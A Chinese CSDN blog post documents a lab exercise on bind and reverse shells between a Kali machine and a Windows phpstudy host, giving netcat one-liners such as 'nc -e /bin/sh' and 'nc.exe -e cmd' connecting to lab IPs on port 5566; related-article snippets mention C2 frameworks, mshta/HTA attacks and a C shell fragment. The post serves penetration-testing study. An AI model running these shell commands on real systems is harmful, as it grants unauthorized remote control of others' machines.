正反向连接&反弹shell

最新推荐文章于 2024-08-22 13:59:01 发布
最新推荐文章于 2024-08-22 13:59:01 发布
阅读量503 收藏
点赞数
分类专栏: 反弹shell 文章标签: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AlunXZhou/article/details/129815668
版权

实验环境

kali攻击机:ip——192.168.91.128

win物理机: phpstudy搭建环境 ip——192.168.2.192

实验目的

采用正反向连接,尝试用kali连接windows,并且反弹shell。

实验步骤

1.开启kali的22端口

(104条消息) 如何在kali系统打开22端口_kali开启22端口_小星唷的博客-CSDN博客icon-default.png?t=N2N8https://blog.csdn.net/weixin_43635067/article/details/128275833

2.xshell连接kali

3.将nc.exe传入phpstudy搭建的目录。

文件上传下载-解决无图形化&解决数据传输

nc.exe在127.0.0.1:80端口搭建的根目录中,现将nc.exe传入127.0.01:8080搭建的根目录中

棱角社区生成命令并传入

 

4.正向连接:本地监听等待对方连接

Linux控制Windows

//绑定CMD到本地5566端口

Windows:nc.exe -e cmd -lvp 5566

//主动连接目标5566

kali:nc 192.168.2.192 5566

Windows控制Linux

//绑定SH到本地5566端口

kali:nc -e /bin/sh -lvp 5566

//主动连接目标5566

windows:nc.exe 192.168.91.128 5566

 

5.反向连接:主动给出去,对方监听

Windows控制Linux

//绑定sh到目标5566端口

kali:nc -e /bin/sh 192.168.2.192 5566

//等待5566连接

Windows:nc -lvvp 5566

Linux控制Windows

//绑定CMD到目标5566端口

Windows:nc -e cmd 192.168.91.128 5566

//等待5566连接

kali:nc -lvvp 5566

 

 

 

alunxzhou
关注
专栏目录
正向shell反弹shell
weixin_45936149的博客
03-26 1万+
正向shell反弹shell的利用场景以及使用技巧
红队内网攻防渗透:内网渗透之内网对抗:代理通讯篇&无外网或不可达&SockS全协议&规则配置&C2正反向上线&解决方案
HACKONE的博客
06-19 305
攻击机使用socks5代理和web靶机通信,web靶机和二层主机使用4444端口通信,相当于全通。0、基石框架篇-单域、子域、父域、域树、域森林网络架构和搭建等。加入修改配置: /etc/proxychains4.conf。2、代理隧道篇-代理通讯网络不可达-SockS代理配置。1、代理隧道篇-代理通讯网络不可达-正反连接上线。C2平台:MSF/CS/Sliver/Viper等。C2平台:MSF/CS/Sliver/Viper等。注意:配置连接IP为C2服务器IP。3、在工具上配置连接属性和规则触发。
Linux反弹shell正向连接
PP Jun的博客
10-02 722
Linux反弹shell正向连接 正向连接:使用ssh命令是主机主动连接受目标机,通过这个连接本机可以主动的向目标机发送一些请求,这称为正向连接。(主机在内网,目标机器在外网) 反向连接:指目标机主动连接主机,通过这个目标机可以主动向主机发送一些请求。(主机在外网,目标机在内网) 此次实验中:CentOS为主机,Min为目标机 First of all,将两台虚拟机设置为仅主机模式 查看CentOS的IP Cent0S的IP为:192.168.79.128 将Min配置网络 Min的IP为:192
SSH正向连接反向连接
icylling的专栏
04-27 6432
ssh -L sourcePort:forwardToHost:onPort connectToHost 意思:连接主机connectToHost,监听本地的端口sorcePort,通过主机connectToHost,把到本地端口sorcePort的连接转发到主机forwardToHost的端口onPort。 图中的两个例子: your host是敲命令的主机。 ssh -L 123:local...
[基础入门]正向shell反弹shell
最新发布
恰柠的博客
08-22 1216
其实这个过程是相对的,需要找到一个参考点,假如说现在目标机器是Windows,攻击机器是LinuxLinux连接Windows这个过程就是正向的,相反,如果Windows主动连接Linux那就是反向的,也叫做反弹。RCE(remote command/code execute) 远程系统命令执行,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。一般出现这种漏洞,是因为应用系统从设计上需要给用户提供指定的远程命令操作的接口。
反弹shell正向连接反向连接
qq_44833342的博客
05-29 459
攻击者通过该连接获得对目标计算机的控制权。在正向连接中,攻击者需要知道目标计算机的IP地址和端口号,通过这些信息建立连接。而在反向连接中,目标计算机会向攻击者的计算机发起连接请求,攻击者只需要监听该请求即可建立连接。因此,反弹shell反向连接更难被防御和检测,也更容易在网络中隐藏攻击者的身份。反弹shell是一种攻击技术,可以在未经授权的情况下远程控制目标计算机。正向连接是攻击者与目标计算机之间建立的连接反向连接是目标计算机与攻击者之间建立的连接,攻击者通过该连接发送命令来控制目标计算机。
内网:正向连接反向连接
尘玥的故事
03-11 1074
反向连接是控制主机监听一个端口,由受害主机反向连接控制主机的过程,适用于受害主机出网(或出网且没有公网ip)的情况。例如,受害主机是一台位于内网,并且没有公网ip且能访问互联网的主机,控制主机无法直接通过ip地址访问到受害主机。例如下面,受害主机具有公网ip,被控主机kali可以通过ip地址访问到受害主机,所以能够使用正相连接来控制受害主机。正向连接是受害主机监听一个端口,由控制主机主动去连接受害主机的过程,适用于受害主机具有。由于正向连接是被攻击者主动连接攻击者,所以不受防火墙策略的限制。
linux正向连接shell_[经验] Linux 怎么连接 Xshell?
weixin_33701632的博客
12-24 399
(1) 首先, 你要先有一个可以正常运行的 Linux 系统, 当然一般情况下我们是把这个系统放在虚拟机里的, 我所使用的是ubuntu-18.04.2-live-server-amd64.iso(2) 在安装好并登陆上 Linux系统后, 就可以开始表演了1. 在命令行上输入  sudo apt-get install openssh-server  安装 ssh2. 在命令行上输入  sud...
内网渗透之Windows反弹shell(综合)
墨鱼菜鸡
09-10 1101
目录 反向shell简介 01什么是正向shell 02什么是反向shell Windows反弹shell 01NC正向shell 01NC反向shell 02mshta.exe 通过Metasoloit的HTA Web Server模块发起HTA攻击 通过msfvenom生成恶意hta文件 03Rundll32.exe 04Reg...
正反向代理与端口转发技术详解.pptx
09-03
正反向代理与端口转发技术详解】 正反向代理是网络服务中常见的两种技术,主要用于优化资源分配、提高安全性和负载均衡。代理服务器作为客户端与目标服务器之间的中介,处理来自客户端的请求并转发到相应的服务器...
洛匈棱镜正反向特性matlab仿真
01-14
在物理学和光学工程中,它因其独特的正反向特性而备受关注。本项目通过MATLAB进行仿真,深入探讨了洛匈棱镜在正反向操作时的分束角差异以及反向使用时的锥光干涉效应。 首先,让我们来理解洛匈棱镜的正反向特性。洛...
shell正向解析脚本的实现方法
09-14
主要介绍了shell正向解析脚本的实现方法,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
linux正向连接shell_使用netcat的正向 / 反向shell
weixin_39947306的博客
12-24 1069
reverse shellbind shellreverse shell描述图:在此示例中,目标使用端口4444反向连接攻击主机。-e选项将Bash shell发回攻击主机。请注意,我们也可以在Windows的cmd.exe上使用-e选项。假设我们已经在目标主机上找到了远程代码执行(RCE)漏洞。我们可以在目标主机上使用-e发出Netcat命令,并使用Netcat发出命令启动反向shell。先启动...
正反连接获得SHELL
kakaxia6337的专栏
08-22 734
#include #include #pragma comment(lib,"ws2_32.lib") SOCKET locals; STARTUPINFO si; PROCESS_INFORMATION pi; struct sockaddr_in s_sin; void help(char *cmd) { printf("CmdShell v1.0 ---- Made by Zwell/n"); printf("/tUsage:%s [host] port
Linux-SSH反向连接(内网穿透,打洞)
张氏小毛驴的博客
08-18 1838
另一种就是SSH反向连接,就是内网是可以访问到外网的,那么内网主机先主动连接外网主机,这样一来就建立了连接,然后外网主机就可以ssh登录到内网主机了,这就是所谓的反向连接。对于外网来说,公司内部的是内网,中间隔了个防火墙,如果想从外网去访问公司内部网络,正常情况下是不可行的,也无法做到端口转发(除非在公司防火墙上打个洞),一般场景有外网访问公司内网,外网访问学校的内网。前面说过这种反向连接不稳定,可能随时会断开,这时候又得重复上面步骤去打通,而当你无法登陆上内网主机去操作以上的步骤时候,那就没法玩了。...
Linux 反向连接ssh
sailist的记录站
01-30 586
学校内网需要翻墙才能够连接上就很麻烦,于是搜了搜,果然有反向连接这种东西。 具体原理就是内网可以访问外网,所以内网用ssh反过来监听外网服务器上的连接,这样外网就可以连到内网了。 踩了不少坑,主要是端口都没有说明好,这里写一下:
linux 反向链接,ssh反向连接和简单实现
weixin_36087357的博客
05-12 378
给主人留下些什么吧!~~http://fdhhgfjjhg.ebdoor.com/http://lkmnhgug.ebdoor.com/http://bgngfdgfdhgfj.ebdoor.com/http://bgtdssgfdgd.ebdoor.com/http://nhmjfgjjghk.ebdoor.com/http://mjhgsgffdhgfhgf.ebdoor.com/http:/...
linux反向连接如何免密码,编写受密码保护的反向ShellLinux x64)
weixin_39845430的博客
05-02 51
第一阶段:概述首先,我们试图在这里实现什么?我们的目标是为Linux x64架构编写shellcode,它将通过TCP/IPv4连接回远程位置,并且只有在远程客户端提供有效密码后才提供shell。为了编写一个规则的反向shell,我们需要链接几个系统调用。具体顺序如下(我们稍后会处理身份验证):我们创建一个新的socket来管理与socket syscall调用的连接我们连接到发出connect ...
反向连接linux命令参数,linux下常用命令参数详解-nc
weixin_33344629的博客
04-29 258
'nc.exe -h'即可看到各参数的使用方法。基本格式:nc [-options] hostname port[s] [ports] ... nc -l -p port [options] [hostname] [port]-d 后台模式-e prog 程序重定向,一旦连接,就执行 [危险!!]-g gateway source-routing hop point[s], up to 8-G...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

alunxzhou

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值